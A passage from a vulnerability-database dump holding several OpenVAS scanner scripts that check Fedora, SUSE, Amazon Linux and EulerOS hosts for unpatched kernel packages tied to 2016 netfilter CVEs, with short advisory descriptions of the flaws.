License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808914\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-02 10:54:58 +0530 (Tue, 02 Aug 2016)\");\n script_cve_id(\"CVE-2016-4470\", \"CVE-2016-1583\", \"CVE-2016-4998\", \"CVE-2016-4997\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-63ee0999e4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-63ee0999e4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/57USMCT2MVQZR6AHRMSAA74YEHCO2OKA\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.4.14~200.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5728", "CVE-2016-1583", "CVE-2016-4997", "CVE-2016-4470", "CVE-2016-4998"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-07-02T00:00:00", "id": "OPENVAS:1361412562310808522", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808522", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-1c409313f4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-1c409313f4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808522\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-02 06:38:59 +0200 (Sat, 02 Jul 2016)\");\n script_cve_id(\"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4998\", \"CVE-2016-5728\",\n \"CVE-2016-4997\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-1c409313f4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-1c409313f4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6AP44WYNH7WHAMP5WVQMJC3Z55GPMFJJ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.6.3~300.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:36:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-07-01T00:00:00", "id": "OPENVAS:1361412562310851360", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851360", "type": "openvas", "title": "SUSE: Security Advisory for kernel (SUSE-SU-2016:1710-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851360\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-07-01 05:25:24 +0200 (Fri, 01 Jul 2016)\");\n script_cve_id(\"CVE-2016-4998\", \"CVE-2016-4997\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for kernel (SUSE-SU-2016:1710-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SUSE Linux Enterprise 12 GA kernel was updated to receive one critical\n security fix.\n\n Security issue fixed:\n\n - CVE-2016-4997: A buffer overflow in 32bit compat_setsockopt iptables\n handling could lead to a local privilege escalation. (bsc#986362)\");\n\n script_tag(name:\"affected\", value:\"kernel on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:1710-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.60~52.54.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.60~52.54.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.60~52.54.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra\", rpm:\"kernel-default-extra~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra-debuginfo\", rpm:\"kernel-default-extra-debuginfo~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.60~52.54.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.60~52.54.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.60~52.54.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.60~52.54.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.60~52.54.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-man\", rpm:\"kernel-default-man~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5728", "CVE-2016-1583", "CVE-2016-5829", "CVE-2016-1237", "CVE-2016-4470", "CVE-2016-4998"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-07-10T00:00:00", "id": "OPENVAS:1361412562310808556", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808556", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-73a733f4d9", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-73a733f4d9\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808556\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-10 07:19:32 +0200 (Sun, 10 Jul 2016)\");\n script_cve_id(\"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4998\", \"CVE-2016-5829\", \"CVE-2016-5728\", \"CVE-2016-1237\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-73a733f4d9\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-73a733f4d9\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FVENSYS4VXRLKHNVGHP4I4USAPYJ2RFT\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.5.7~202.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:56:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4951", "CVE-2016-4997", "CVE-2016-4998"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-10-26T00:00:00", "id": "OPENVAS:1361412562310120707", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120707", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-718)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120707\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:14 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-718)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in the Linux kernel. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update kernel to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-718.html\");\n script_cve_id(\"CVE-2016-4951\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-devel\", rpm:\"kernel-tools-devel~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:32:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998", "CVE-2016-3134"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220161048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220161048", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2016-1048)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2016.1048\");\n script_version(\"2020-01-23T10:40:56+0000\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:40:56 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:40:56 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2016-1048)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2016-1048\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1048\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2016-1048 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The netfilter subsystem in the Linux kernel through 4.5.2 does not validate certain offset fields, which allows local users to gain privileges or cause a denial of service (heap memory corruption) via an IPT_SO_SET_REPLACE setsockopt call.(CVE-2016-3134)\n\nThe compat IPT_SO_SET_REPLACE and IP6T_SO_SET_REPLACE setsockopt implementations in the netfilter subsystem in the Linux kernel before 4.6.3 allow local users to gain privileges or cause a denial of service (memory corruption) by leveraging in-container root access to provide a crafted offset value that triggers an unintended decrement.(CVE-2016-4997)\n\nThe IPT_SO_SET_REPLACE setsockopt implementation in the netfilter subsystem in the Linux kernel before 4.6 allows local users to cause a denial of service (out-of-bounds read) or possibly obtain sensitive information from kernel heap memory by leveraging in-container root access to provide a crafted offset value that leads to crossing a ruleset blob boundary.(CVE-2016-4998)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~229.42.1.93\", 